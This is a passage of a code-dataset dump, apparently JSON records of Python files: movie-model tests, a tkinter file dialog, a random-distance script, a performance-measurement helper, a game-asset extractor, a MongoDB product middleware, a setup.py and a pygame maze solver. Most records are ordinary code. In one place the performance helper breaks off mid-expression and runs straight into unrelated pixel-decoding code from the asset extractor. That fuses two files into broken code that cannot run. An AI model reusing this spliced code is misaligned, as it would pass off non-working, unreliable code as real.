+{"seq_id":"67971495","text":"from datetime import date\n\nimport pytest\n\nfrom app import create_app, db\nfrom app.models import Movie, Actor, ValidationError\n\n\n@pytest.fixture(autouse=True)\ndef init_test_db():\n app = create_app('testing')\n with app.app_context():\n db.create_all()\n yield\n db.drop_all()\n\n\ndef test_movie_model():\n first_movie = Movie(title='TITLE1', release_date=date(2020, 1, 1))\n first_movie.save()\n second_movie = Movie(title='TITLE2', release_date=date(2020, 1, 2))\n second_movie.save()\n\n saved_movies = Movie.query.all()\n assert len(saved_movies) == 2\n\n first_saved_movie = Movie.query.get(1)\n assert first_saved_movie.title == 'TITLE1'\n assert first_saved_movie.release_date == date(2020, 1, 1)\n\n second_saved_movie = Movie.query.get(2)\n assert second_saved_movie.title == 'TITLE2'\n assert second_saved_movie.release_date == date(2020, 1, 2)\n\n first_saved_movie.remove()\n assert Movie.query.get(1) is None\n\n\ndef test_movie_to_dict():\n movie = Movie(title='TITLE', release_date=date(2020, 1, 1))\n assert movie.to_dict() == {\n 'id': None,\n 'title': 'TITLE',\n 'release_date': '2020-01-01',\n }\n\n\ndef test_actor_model():\n first_actor = Actor(name='ACTOR1', age=10, gender='F')\n first_actor.save()\n second_actor = Actor(name='ACTOR2', age=20, gender='M')\n second_actor.save()\n\n saved_actors = Actor.query.all()\n assert len(saved_actors) == 2\n\n first_saved_actor = Actor.query.get(1)\n assert first_saved_actor.name == 'ACTOR1'\n assert first_saved_actor.age == 10\n assert first_saved_actor.gender == 'F'\n\n second_saved_actor = Actor.query.get(2)\n assert second_saved_actor.name == 'ACTOR2'\n assert second_saved_actor.age == 20\n assert second_saved_actor.gender == 'M'\n\n first_saved_actor.remove()\n assert Actor.query.get(1) is None\n\n\ndef test_actor_non_negative_age():\n with pytest.raises(ValidationError, match='Age is negative'):\n Actor(age=-1)\n\n\ndef test_actor_to_dict():\n actor = Actor(name='Actor', age=10, gender='F')\n assert actor.to_dict() == {\n 'id': None,\n 'name': 'Actor',\n 'age': 10,\n 'gender': 'F'\n }\n","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524806095","text":"#!/usr/bin/env python3\r\n\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport action\r\nimport Controller\r\n\r\n'''\r\nHandles Create window\r\n'''\r\n\r\nclass Frame(ttk.Frame):\r\n def __init__(self, parent):\r\n ttk.Frame.__init__(self, parent, padding=\"10 10 10 10\")\r\n self.parent = parent\r\n #print(parent)\r\n \r\n # Define string variables for text entry fields\r\n self.name = tk.StringVar()\r\n\r\n self.initComponents()\r\n\r\n def initComponents(self):\r\n self.pack()\r\n\r\n # Display the grid of labels and text entry fields\r\n ttk.Label(self, text=\"File Name (no extension):\").grid(\r\n column=0, row=0, sticky=tk.E)\r\n ttk.Entry(self, width=25, textvariable=self.name).grid(\r\n column=1, row=0)\r\n\r\n\r\n\r\n\r\n self.makeButtons()\r\n\r\n for child in self.winfo_children():\r\n child.grid_configure(padx=5, pady=3)\r\n\r\n def makeButtons(self):\r\n # Create a frame to store the two buttons\r\n buttonFrame = ttk.Frame(self)\r\n\r\n # Add the button frame to the bottom row of the main grid\r\n buttonFrame.grid(column=0, row=4, columnspan=2, sticky=tk.E)\r\n\r\n # Add two buttons to the button frame\r\n ttk.Button(buttonFrame, text=\"Create\", command=self.create) \\\r\n .grid(column=0, row=0, padx=5)\r\n\r\n #ttk.Button(buttonFrame, text=\"About\", command=self.bt) \\\r\n # .grid(column=1, row=0, padx=5)\r\n\r\n ttk.Button(buttonFrame, text=\"Exit\", command=self.parent.destroy) \\\r\n .grid(column=2, row=0)\r\n\r\n def create(self):\r\n #a bit of a bodge, but it works with a \"loop\" to get round these if bugs\r\n s = \" \"\r\n for i in s:\r\n i = action.makeFile(self.name.get())\r\n if (i == 0):\r\n self.invalidChar()\r\n continue\r\n if (i == 1):\r\n self.Blank()\r\n continue\r\n if (i == 2):\r\n self.Reserved()\r\n continue\r\n if (i == 3):\r\n self.Taken()\r\n continue\r\n else:\r\n self.complete(self.name.get())\r\n\r\n def makeWindow(self):\r\n root = tk.Tk()\r\n root.title(\"Create File\")\r\n Frame(root)\r\n root.mainloop()\r\n \r\n \r\n def complete(self, s):\r\n msg = messagebox.showinfo(\"Complete\", \"A new file \\\"\" + s + \".txt\\\" has been created. Please add terms\")\r\n Controller.output(s)\r\n \r\n def Taken(self):\r\n msg = messagebox.showinfo(\"Taken\", \"File name is taken\")\r\n\r\n def Blank(self):\r\n msg = messagebox.showinfo(\"Blank\", \"File name is blank\")\r\n\r\n def Reserved(self):\r\n msg = messagebox.showinfo(\"Reserved\", \"The file name \\\"Files\\\" is reserved name. Please select another one.\")\r\n\r\n def invalidChar(self):\r\n msg = messagebox.showinfo(\"Invalid Character\", \"An invalid character has been included in the file name. \\n\\nPlease do not include the following: space, tab, return, ! @ # $ % ^ & * ( ) ~ ` ? > < / , . : ; { } [ ] | \\\" ' - \")\r\n \r\n#End of class\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.title(\"Create File\")\r\n Frame(root)\r\n root.mainloop()\r\n \r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Keybasket v 1_4/Keybasket_src/Create.py","file_name":"Create.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"340620348","text":"from statistics import mean\nimport random\n\ndist1_vals = []\ndist2_vals = []\nLOWER_BOUND = 0\nUPPER_BOUND = 999999\nMEAN = mean(range(LOWER_BOUND, UPPER_BOUND))\n\ndef main():\n\tfor i in range(0, 10000):\n\t\ta = random.randint(LOWER_BOUND, UPPER_BOUND)\n\t\tb = random.randint(LOWER_BOUND, UPPER_BOUND)\n\n\t\t# Getting first distance\n\t\tdist1 = abs(a - b)\t\n\t\tdist1_vals.append(dist1)\n\n\t\t# Getting second distance\n\t\tdist2 = abs(a - MEAN)\n\t\tdist2_vals.append(dist2)\n\n\t\tprint(dist1)\n\t\tprint(dist2)\n\t\t\n\tprint(\"Random distance average: \" + str(mean(dist1_vals)))\n\tprint(\"Mean distance average: \" + str(mean(dist2_vals)))\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"512474895","text":"import os\nimport sys\nimport subprocess\n\ndef measure_perf(cmd):\n # Run command\n out = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n # Get output\n stdout, _ = out.communicate()\n\n # Check if start of output is a number\n try:\n num = float(stdout.split(b';')[0])\n except ValueError:\n return -1\n\n # Get running time in ms\n return num\n\ndef measure_trace(cmd):\n # Run command\n out = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n # Get output\n stdout, _ = out.communicate()\n\n tokens = stdout.split(b'\\n')\n\n # Check if start of output is a number\n try:\n if not tokens[0].startswith(b'> 4\n col2 = word & 0x0f\n img_coords = block_y * pix_per_block_row + block_x * BLOCKS_SIZE + y * img_width + 2 * x\n img_data[img_coords] = col1\n img_data[img_coords + 1] = col2\n\n img.putdata(img_data)\n\"\"\"\n\n\nclass VmpAsset:\n class TilesInfo:\n def __init__(self):\n self.wall_type = None\n self.tiles = []\n\n def export(self):\n return {\n 'wallType': self.wall_type,\n 'tiles': [t.export() for t in self.tiles],\n }\n\n class Tile:\n def __init__(self, vcn_block, flipped):\n self.flipped = flipped\n self.vcn_block = vcn_block\n\n def export(self):\n return {\n 'vcn_block': self.vcn_block,\n 'flipped': self.flipped\n }\n\n def __init__(self):\n self.name = None\n self.bg_tiles = None\n self.wall_tiles = None\n self.exported = False\n self.vcn = None\n\n @staticmethod\n def load(basename, vmp_filename, vcn_filename, level_palette):\n with BinaryReader(vmp_filename) as reader:\n shorts_per_tileset = 431\n file_size = reader.read_ushort()\n num_wall_types = int(file_size / shorts_per_tileset) - 1\n\n # one short per block\n bg_tiles = reader.read_ushort(BLOCKS_COLUMNS * BLOCKS_ROWS)\n\n # padding\n wall_tiles = reader.read_ushort(101 + num_wall_types*shorts_per_tileset)\n\n vcn = VcnAsset.load(basename, vcn_filename, level_palette)\n vmp_asset = VmpAsset()\n vmp_asset.vcn = vcn\n vmp_asset.name = basename\n vmp_asset.bg_tiles = bg_tiles\n vmp_asset.wall_tiles = wall_tiles\n return vmp_asset\n\n def export(self, output_dir):\n\n if self.exported:\n return\n\n self.vcn.export(output_dir)\n\n wall_tiles_infos = self._export_vmp_blocks(self.wall_tiles)\n bg_tiles = self._export_vmp_blocks(self.bg_tiles)\n\n data = {\n 'name': self.name,\n 'bgTiles': [t.export() for t in bg_tiles],\n 'wallTiles': [t.export() for t in wall_tiles_infos]\n }\n\n vmp_filename = '%s.vmp.json' % self.name\n with open(os.path.join(output_dir, vmp_filename), 'w') as handle:\n json.dump(data, handle, indent=True, sort_keys=False)\n\n self.exported = True\n\n @staticmethod\n def _export_vmp_blocks(tileset):\n exported_blocks = []\n for tile_index in range(len(tileset)):\n tile = tileset[tile_index]\n flip = (tile & 0x04000) == 0x04000\n vcn_block_index = tile & 0x3fff\n\n exported_blocks.append(VmpAsset.Tile(vcn_block_index, flip))\n\n return exported_blocks\n\n\nclass AssetsManager:\n DATA_DIR = \"data/\"\n BUILD_DIR = \"build/\"\n\n def __init__(self, data_dir=DATA_DIR, build_dir=BUILD_DIR):\n self.images = {}\n self.decorations = {}\n self.texts = []\n self.mazes = {}\n self.vmps = {}\n\n self.id_gen = 0\n self.data_dir = data_dir\n self.build_dir = build_dir\n self.palette_filename = None\n self.palette = None\n\n def set_palette(self, palette_filename):\n palette_filename = os.path.join(self.data_dir, palette_filename.upper())\n\n if not palette_filename.endswith(PAL_EXTENSION): palette_filename += PAL_EXTENSION\n 
self.palette_filename = palette_filename\n self.palette = gfx.load_palette(self.palette_filename)\n\n def export_cps_image(self, cps_filename):\n\n if cps_filename in self.images:\n return\n\n rel_cps_filename = os.path.join(self.data_dir, cps_filename.upper())\n if not rel_cps_filename.endswith(CPS_EXTENSION): rel_cps_filename += CPS_EXTENSION\n\n img = gfx.load_cps(rel_cps_filename, self.palette)\n image_asset = self._export_image(img, cps_filename + '.png')\n image_asset.original_asset = rel_cps_filename\n\n return image_asset\n\n def export_dec_file(self, dec_assets_ref):\n\n dec_key = str(dec_assets_ref)\n if dec_key in self.decorations:\n return\n\n dec_asset = DecorationsAsset()\n dec_asset.original_assets = dec_assets_ref\n\n self.decorations[dec_key] = dec_asset\n\n with BinaryReader('data/{file}'.format(file=dec_assets_ref.get_dec_file())) as reader:\n count = reader.read_ushort()\n\n for i in range(count):\n deco = Decoration()\n deco.rectangle_indices = [-1 if value == 255 else value for value in reader.read_ubyte(10)]\n deco.next_decoration_index = reader.read_byte()\n deco.flags = reader.read_byte()\n deco.x_coords = reader.read_short(10)\n deco.y_coords = reader.read_short(10)\n\n dec_asset.append_decoration(deco)\n\n count = reader.read_ushort()\n for i in range(count):\n rect = list(reader.read_ushort(4))\n rect[0] *= 8\n rect[2] *= 8\n dec_asset.append_rectangle(ShapeRect(*rect))\n\n dec_exported_filename = os.path.join(self.build_dir, dec_assets_ref.get_dec_file())\n image_asset = self.export_cps_image(dec_assets_ref.get_gfx_file())\n\n dec_asset.filename = dec_exported_filename\n dec_asset.image_filename = image_asset.filename\n\n with open(dec_exported_filename, 'w') as handle:\n json.dump(dec_asset.export(), handle, indent=True, sort_keys=False)\n\n return dec_asset\n\n def export_texts(self):\n file = os.path.join(self.data_dir, 'TEXT.DAT')\n offsets = []\n with BinaryReader(file) as reader:\n while True:\n offset = reader.read_ushort()\n offsets.append(offset)\n if reader.offset >= offsets[0]:\n break\n\n for id, offset in enumerate(offsets):\n\n if id == len(offsets) - 1:\n length = os.path.getsize(file) - offsets[id]\n else:\n length = offsets[id + 1] - offsets[id]\n\n self.texts.append(reader.read_string(length))\n\n with open(os.path.join(self.build_dir, 'texts.json'), 'w') as handle:\n json.dump(self.texts, handle, indent=True, sort_keys=False)\n\n return self.texts\n\n def export_maze(self, maze_name):\n maze_filename = maze_name.upper()\n if not maze_filename.endswith(MAZ_EXTENSION):\n maze_filename += MAZ_EXTENSION\n\n with BinaryReader(os.path.join(self.data_dir, maze_filename)) as reader:\n\n width = reader.read_ushort()\n height = reader.read_ushort()\n faces = reader.read_ushort()\n\n walls = [[None for _ in range(height)] for _ in range(width)]\n\n for y in range(height):\n for x in range(width):\n n = reader.read_ubyte()\n e = reader.read_ubyte()\n s = reader.read_ubyte()\n w = reader.read_ubyte()\n\n walls[x][y] = {\n 'x': x,\n 'y': y,\n 'n': n,\n 's': s,\n 'w': w,\n 'e': e,\n }\n\n maze = Maze(maze_name, width, height, faces, walls)\n self.mazes[maze_name] = maze\n\n with open(os.path.join(self.build_dir, maze_name), 'w') as handle:\n json.dump(maze.__dict__, handle, indent=True, sort_keys=False)\n\n def load_dcr(self, name=''):\n\n filename = name.upper()\n if not filename.endswith(DCR_EXTENSION):\n filename += DCR_EXTENSION\n\n rel_filename = os.path.join(self.data_dir, filename)\n if not os.path.exists(rel_filename):\n return None\n\n with 
BinaryReader(rel_filename) as reader:\n count = reader.read_ushort()\n for i in range(count):\n dcr_asset = DcrAsset(name)\n\n sides = []\n for j in range(6):\n side = DcrAsset.SideData()\n side.cps_x = reader.read_ubyte() * 8\n side.cps_y = reader.read_ubyte()\n side.width = reader.read_ubyte() * 8\n side.height = reader.read_ubyte()\n side.screen_x = reader.read_ubyte()\n side.screen_y = reader.read_ubyte()\n\n sides.append(side)\n\n dcr_asset.sides = sides\n\n return dcr_asset\n\n def get_decorations(self, dec_assets_ref):\n return self.decorations[str(dec_assets_ref)]\n\n def get_image(self, cps_filename):\n return self.images[cps_filename]\n\n def get_text(self, i):\n return self.texts[i]\n\n def get_maze(self, maze_name):\n return self.mazes[maze_name]\n\n def export_items(self):\n items = [] # ITEM.DAT\n items_names = []\n\n with BinaryReader('data/ITEM.DAT') as reader:\n count = reader.read_ushort()\n for i in range(count):\n item = {\n 'unidentified_name': reader.read_ubyte(),\n 'identified_name': reader.read_ubyte(),\n 'flags': reader.read_ubyte(),\n 'picture': reader.read_ubyte(),\n 'type': reader.read_ubyte(), # See types below\n\n # Where the item lies at position\n # In Maze:\n # 0..3-> Bottom\n # 4..7-> Wall (N,E,S,W)\n # For EotB I: 0..3-> Floor NW,NE,SW,SE\n # 8-> Compartment\n # If in inventory:\n # 0..26-> Position in Inventory\n 'sub_position': reader.read_ubyte(),\n\n # Position in maze x + y * 32, consumed if <= 0\n 'coordinate': reader.read_ushort(),\n 'next': reader.read_ushort(),\n 'previous': reader.read_ushort(),\n\n # Level, where the item lies, 0 <= no level\n 'level': reader.read_ubyte(),\n\n # The value of item, -1 if consumed\n 'value': reader.read_byte(),\n }\n pos = divmod(item['coordinate'], 32)\n item['coordinate'] = {'x': pos[1], 'y': pos[0]}\n items.append(item)\n\n count = reader.read_ushort()\n for i in range(count):\n name = reader.read_string(35)\n items_names.append(name)\n\n for item in items:\n item['unidentified_name'] = items_names[item['unidentified_name']]\n item['identified_name'] = items_names[item['identified_name']]\n\n with open(os.path.join(self.build_dir, 'items.json'), 'w') as handle:\n json.dump(items, handle, indent=True, sort_keys=False)\n\n def export_item_types(self):\n item_types = []\n with BinaryReader(os.path.join(self.data_dir, 'ITEMTYPE.DAT')) as reader:\n count = reader.read_ushort()\n for i in range(count):\n item_type = {\n # At which position in inventory it is allowed to be put. See InventoryUsage\n 'slots': str(ItemSlotFlags(reader.read_ushort())),\n 'flags': str(ItemFlags(reader.read_ushort())),\n 'armor_class': reader.read_byte(), # Adds to armor class\n 'allowed_classes': str(ProfessionFlags(reader.read_ubyte())),\n # Allowed for this profession. 
See ClassUsage\n 'allowed_hands': str(HandFlags(reader.read_ubyte())), # Allowed for this hand\n 'damage_vs_small': str(Dice(reader)),\n 'damage_vs_big': str(Dice(reader)),\n # 'damage_incs': reader.read_ubyte(),\n 'unknown': reader.read_ubyte(),\n 'usage': str(ItemTypeUsage(reader.read_ushort())),\n }\n\n item_types.append(item_type)\n\n with open(os.path.join(self.build_dir, 'item_types.json'), 'w') as handle:\n json.dump(item_types, handle, indent=True, sort_keys=False)\n\n def load_vmp(self, vmp_name=''):\n\n if vmp_name in self.vmps:\n return self.vmps[vmp_name]\n\n vmp_filename = vmp_name.upper()\n if not vmp_filename.endswith(VMP_EXTENSION):\n vmp_filename += VMP_EXTENSION\n\n vmp_filename = os.path.join(self.data_dir, vmp_filename)\n if not os.path.exists(vmp_filename):\n raise Exception('Cannot find VMP file %s' % vmp_filename)\n\n vcn_filename = vmp_name.upper() + '.VCN'\n vcn_filename = os.path.join(self.data_dir, vcn_filename)\n if not os.path.exists(vcn_filename):\n raise Exception('Cannot find the VCN file %s' % vcn_filename)\n\n vmp_asset = VmpAsset.load(vmp_name, vmp_filename, vcn_filename, self.palette)\n self.vmps[vmp_name] = vmp_asset\n\n return vmp_asset\n\n def export_vmp(self, vmp_name):\n if vmp_name not in self.vmps:\n vmp = self.load_vmp(vmp_name)\n else:\n vmp = self.vmps[vmp_name]\n if vmp.exported:\n return vmp\n\n vmp.export(self.build_dir)\n vmp.exported = True\n return vmp\n\n \"\"\"\n def export_walls(self, wall_type, vmp):\n img_width = 24 * BLOCKS_SIZE\n img_height = 18 * BLOCKS_SIZE\n\n img = Image.new('P', (img_width, img_height))\n img.putpalette(vmp.vcn.walls_palette)\n\n img_data = [255 for _ in range(img_width * img_height)]\n\n for wall_pos in [22]:\n cfg = walls_render_config[wall_pos]\n offset = cfg.base_offset\n\n for y in range(cfg.blk_height):\n\n for x in range(2,4):#cfg.blk_width):\n\n if cfg.flip:\n block_index = cfg.view_offset + cfg.blk_width - (x + 1) + y * BLOCKS_COLUMNS\n else:\n block_index = x + y * BLOCKS_COLUMNS + cfg.view_offset\n\n block_x = block_index % BLOCKS_COLUMNS\n block_y = block_index // BLOCKS_COLUMNS\n\n tile = vmp.wall_tiles_infos[wall_type].tiles[offset]\n flip = tile.flipped ^ cfg.flip\n block = vmp.vcn.blocks[tile.vcn_block]\n\n self.blit_block(img_data, img_width, block_x * BLOCKS_SIZE, block_y * BLOCKS_SIZE, block, flip)\n\n offset += 1\n\n offset += cfg.skip\n\n img.putdata(img_data)\n self._export_image(img, f'walls_{vmp.name}_{wall_type}.png')\n\n\n \"\"\"\n\n @staticmethod\n def _export_vmp_blocks(tileset, num_tiles):\n exported_blocks = []\n for tile_index in range(num_tiles):\n tile = tileset[tile_index]\n flip = (tile & 0x04000) == 0x04000\n vcn_block_index = tile & 0x3fff\n\n exported_blocks.append(VmpAsset.Tile(vcn_block_index, flip))\n\n return exported_blocks\n\n def _export_image(self, pil_img, filename):\n exported_filename = os.path.join(self.build_dir, filename.lower())\n pil_img.convert('RGB').save(exported_filename)\n\n image_asset = ImageAsset(self.id_gen, exported_filename, full_path=os.path.abspath(exported_filename))\n\n self.images[filename] = image_asset\n self.id_gen += 1\n return image_asset\n\n\ndef blit_block(image_data, img_width, x, y, vcn_block, flip):\n s = -1 if flip else 1\n p = 7 if flip else 0\n\n for w in range(8):\n for v in range(4):\n word = vcn_block[v + w * 4]\n col1 = (word & 0xf0) >> 4\n col2 = word & 0x0f\n coords = x + p + s * 2 * v + (y + w) * img_width\n image_data[coords] = col1\n image_data[coords + s] = 
col2\n","sub_path":"assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":24090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"453637540","text":"from pottery.entities import products\nfrom pottery.resources.exceptions import PotteryException\nfrom pottery.converters import product_converter\nfrom pottery.resources.utils import to_dict\nimport pymongo\n\n\n# convert the product object which comes from product_catalog to product entity object(database object) and save.\nclass product_middleware:\n def create_product(self, product):\n try:\n if products.product_entity.objects.get({'_id': product.id}) != None:\n raise PotteryException(f'A1: Pottery item with the id {product.id} already exist')\n except Exception as e:\n if e.__class__.__name__ == 'PotterException':\n raise e\n elif e.__class__.__name__ =='DoesNotExist':\n pass\n else:\n raise Exception(\"Internal server error\")\n\n prod_data = products.product_entity(id=product.id, name=product.name, title=product.title,\n description=product.description, weight=product.weight,\n dimentions=product.dimentions, price=product.price,\n image=product.image).save()\n return self.get_product(product.id)\n\n def get_product(self, product_id):\n prod_data = products.product_entity.objects.get({'_id': product_id})\n return product_converter.product_entity_to_product(prod_data)\n\n def get_products(self,limit=10,marker=0):\n print(limit)\n print(marker)\n product_entities = products.product_entity.objects.order_by([('_id',pymongo.ASCENDING)]).skip(limit*marker).limit(limit)\n return product_converter.product_entities_to_products(product_entities)\n\n def delete_product(self, product_id):\n if products.product_entity.objects.get({'_id':product_id}) == None :\n raise PotteryException(f'A2: Pottery item with the id {product_id} Doesnt exist')\n prod_data = products.product_entity.objects.get({'_id': product_id}).delete()\n\n def update_product(self,product_id,product):\n gp = self.get_product(product_id)\n resp = to_dict(gp)\n if resp['id']!=product.id:\n raise PotteryException('Id missmatch')\n\n try:\n product_entity = products.product_entity.objects.get({'_id':product_id})\n product_entity.name = product.name\n product_entity.weight = product.weight\n product_entity.title=product.title\n product_entity.description=product.description\n product_entity.dimentions=product.dimentions\n product_entity.price=product.price\n product_entity.image=product.image\n product_entity.save()\n return self.get_product(product_id)\n except:\n raise PotteryException(f'A3: pottery ite with the id {product_id} Does not exist')\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pottery/middleware/product_orchestrator.py","file_name":"product_orchestrator.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"334479749","text":"import os\nimport sys\nfrom functools import reduce\nfrom os.path import join as opj\nfrom distutils.core import setup, Extension\nfrom Cython.Distutils import build_ext\nfrom DistUtilsExtra.command import build_i18n,build_help,build_icons,build_extra\n__package_name__ = 'gsrp5server'\n__package_file__ = 'gsrp5-server'\n\nmodules = []\n\npackage_data = {'gsrp5server':['*.rng','certs/*']}\n\ndata_files = [('/lib/systemd/system',[opj(__package_name__,'conf','gsrp5-server.service')]),('/etc/gsrp5-server.d',[opj(__package_name__,'conf','gsrp5-server.conf')])]\n\nfor lang in os.listdir(opj(__package_name__,'locale')):\n\tdata_files.append((os.path.join(sys.prefix,'share', 'locale', lang, 'LC_MESSAGES'),[opj(__package_name__,'locale', lang, 'LC_MESSAGES','gsrp5server.mo')]))\n\nfor d in os.walk('gsrp5server'):\n\tl = list(map(lambda x:x[:-2],list(filter(lambda x: x[0] != '.' and x[-2:]=='.c',d[2]))))\n\tif len(l) > 0:\n\t\ta=list(map(lambda x:opj(d[0],x), l ))\n\t\tfor n in a:\n\t\t\tmodules.append(Extension('%s' % (n.replace(os.path.sep,'.'),), sources = ['%s' % (n + '.c')],language='clang'))\nfor sd in ('root','addons'):\t\t\t\n\tfor d in os.walk(opj('gsrp5server',sd)):\n\t\tl = list(map(lambda x:x,list(filter(lambda x: x[-4:] in ('.xml','.csv','.pot','.rml') or x[-5:] in ('.yaml','.docx','.xlsx') or x[-3:] == '.po' or x == '__manifest__.info',d[2]))))\n\t\tif len(l) > 0:\n\t\t\ta=list(map(lambda x:opj(d[0],x), l ))\n\t\t\tfor n in a:\n\t\t\t\tdata_files.append((opj(sys.base_prefix,'lib64','python'+('%s.%s') % (sys.version_info.major,sys.version_info.minor),'site-packages',d[0]),[n]))\n\npackages = ['gsrp5server']\n\nsetup (name = __package_name__,package_data = package_data, data_files = data_files, scripts = [opj(__package_name__,'script/gsrp5-server')], packages = packages,package_dir = {__package_name__:'gsrp5server'},version = '1.0.1', description = 'Global System Resource Planing',long_description = 'Global System Resource Planing & Executing', author='Nikolay Chesnokov', author_email='nikolaychesnokov@gmail.com' , url='http://www.gsrp5.org', license='AGPL-3'\n,cmdclass = { 'build_ext': build_ext, \"build\" : build_extra.build_extra,'build_i18n':build_i18n.build_i18n}, ext_modules = modules)\n\n\n\n","sub_path":"server/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"529127036","text":"import pygame\nimport random\nimport solver\nr = random.randint\nimgSize = 32\nclass Maze():\n def __init__(self, nRows, nColumns, ecran, font):\n # loading the textures for the canvas\n self._water = [0] * 4\n self._magma = [0] * 4\n for i in range(4):\n self._water[i] = pygame.image.load(f\"img\\\\water\\\\water{i + 1}.png\")\n for i in range(4):\n self._magma[i] = pygame.image.load(f\"img\\\\magma\\\\magma{i + 1}.png\")\n self._start = pygame.image.load(\"img\\\\boat.png\")\n self._end = pygame.image.load(\"img\\\\chest.png\")\n self._enqueued = pygame.image.load(\"img\\\\actual.png\")\n self._visited = pygame.image.load(\"img\\\\vizitat.png\")\n # setting the starting and ending point to null\n self._startPoint = 0\n self._endPoint = 0\n\n self._ecran = ecran\n self._nRows = nRows\n self._nColumns = nColumns\n self._matrix = [0] * nRows\n for i in range(nRows):\n self._matrix[i] = [0] * nColumns\n self.initializeMatrix()\n self._font = font\n\n self._s = 0\n def borderMatrix(self):\n # creates the magma wall\n for i in range(self._nRows):\n self._matrix[i][0] = self._matrix[i][self._nColumns - 1] = 20 + r(1, 4)\n for i in range(self._nColumns):\n self._matrix[0][i] = self._matrix[self._nRows - 1][i] = 20 + r(1, 4)\n def initializeMatrix(self):\n # puts only water and magma wall, and reset the states of the class\n self._s = 0\n self._startPoint = self._endPoint = 0\n for i in range(self._nRows):\n for j in range(self._nColumns):\n self._matrix[i][j] = 10 + r(1, 4)\n self.borderMatrix()\n def showMatrix(self):\n # setting images on canvas\n if self._s != 0:\n distMatrix = self._s.getDistMatrix()\n for i in range(self._nRows):\n for j in range(self._nColumns):\n if self._matrix[i][j] // 10 == 0:\n if self._matrix[i][j] == 0:\n self._ecran.blit(self._visited, (i * imgSize, j * imgSize))\n elif self._matrix[i][j] == 1:\n self._ecran.blit(self._enqueued, (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 1:\n self._ecran.blit(self._water[self._matrix[i][j] % 10 - 1], (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 2:\n self._ecran.blit(self._magma[self._matrix[i][j] % 10 - 1], (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 3:\n self._ecran.blit(self._start, (i * imgSize, j * imgSize))\n elif self._matrix[i][j] // 10 == 4:\n self._ecran.blit(self._end, (i * imgSize, j * imgSize))\n if self._s != 0 and distMatrix[i][j] >= 0:\n self._ecran.blit(self._font.render(str(distMatrix[i][j]), True, self.getColor(distMatrix[i][j])), (i * imgSize, j * imgSize))\n def draw(self, x, y):\n # a long long condition to not kill the boat or the treasure\n if self._testXY(x, y) and (self._startPoint != 0 and (self._startPoint[0] != x or self._startPoint[1] != y)) and (self._endPoint != 0 and (self._endPoint[0] != x or self._endPoint[1] != y)):\n self._matrix[x][y] = 20 + r(1, 4)\n def erase(self, x, y):\n # a long long condition to not draw over the boat or treasure and delete the walls\n if self._testXY(x, y) and (self._startPoint != 0 and (self._startPoint[0] != x or self._startPoint[1] != y)) and (self._endPoint != 0 and (self._endPoint[0] != x or self._endPoint[1] != y)):\n self._matrix[x][y] = 10 + r(1, 4)\n def canStart(self):\n # this let the algotithm start iff you set the startingPoint and endingPoint\n if self._startPoint != 0 and self._endPoint != 0:\n return True\n else:\n return False\n def setStart(self, x, y):\n if self._startPoint != 0 and self._endPoint != 0 and (self._endPoint[0] == x and self._endPoint[1] == y):\n # 
this conditional statement just swaps the boat with the treasure\n            self._startPoint, self._endPoint = self._endPoint, self._startPoint\n            self._matrix[self._startPoint[0]][self._startPoint[1]] = 30\n            self._matrix[self._endPoint[0]][self._endPoint[1]] = 40\n        else:\n            if self._startPoint != 0 and (self._startPoint[0] != x or self._startPoint[1] != y):\n                # putting the boat on its current position changes nothing; it only moves if the target is somewhere else\n                self._matrix[self._startPoint[0]][self._startPoint[1]] = r(1, 2) * 10 + r(1, 4)  # in the boat's last position, magma or water will appear\n                self._startPoint = 0\n            if self._matrix[x][y] // 10 == 1:\n                # this won't let you put the boat on magma\n                self._matrix[x][y] = 30\n                self._startPoint = (x, y)\n        print(self._startPoint, self._endPoint)\n    def setEnd(self, x, y):\n        if self._endPoint != 0 and self._startPoint != 0 and (self._startPoint[0] == x and self._startPoint[1] == y):\n            # this if just swaps the treasure with the boat; it isn't necessary, but it looks cool\n            self._startPoint, self._endPoint = self._endPoint, self._startPoint\n            self._matrix[self._startPoint[0]][self._startPoint[1]] = 30\n            self._matrix[self._endPoint[0]][self._endPoint[1]] = 40\n        else:\n            # this is the most important part of setting the ending point\n            if self._endPoint != 0 and (self._endPoint[0] != x or self._endPoint[1] != y):\n                # putting the treasure on its current place leaves it unchanged\n                self._matrix[self._endPoint[0]][self._endPoint[1]] = r(1, 2) * 10 + r(1, 4)  # when the treasure moves, its old place becomes magma or water\n                self._endPoint = 0\n            if self._matrix[x][y] // 10 == 1:\n                # with this condition you can put the treasure only on water\n                self._matrix[x][y] = 40\n                self._endPoint = (x, y)\n        print(self._startPoint, self._endPoint)\n    def _testXY(self, x, y):\n        # tests whether x and y are inside the map\n        return x != 0 and x != self._nRows - 1 and y != 0 and y != self._nColumns - 1\n    def startSolve(self):\n        # creates an instance of the Solve class; this is mostly for visualisation:\n        # if a single method solved Lee/DFS outright, only the beginning and the result of the algorithm would be visible;\n        # by stepping through it, the map can be redrawn after every step\n        self._s = solver.Solve(self._nRows, 